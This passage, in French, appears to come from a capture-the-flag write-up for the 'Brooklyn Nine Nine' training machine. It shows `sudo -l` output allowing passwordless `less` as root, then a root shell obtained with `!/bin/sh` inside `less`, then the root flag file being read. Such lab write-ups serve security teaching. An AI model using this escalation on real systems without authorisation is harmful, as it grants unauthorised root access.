En regardant ce que peut faire le compte de Jake en sudo, nous pouvons voir qu'il peut lancer less avec sudo :
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/CODE:sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
Selon le site https://gtfobins.org/gtfobins/less, il suffit de taper
!/bin/sh
à l'intérieur d'un less pour devenir root.
Nous allons tenter cette approche :
jake@brookly_nine_nine:~$ sudo /usr/bin/less /etc/hosts
# whoami
root
Nous pouvons facilement lire le fichier du flag.
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 6******************************5
Enjoy!!
6******************************5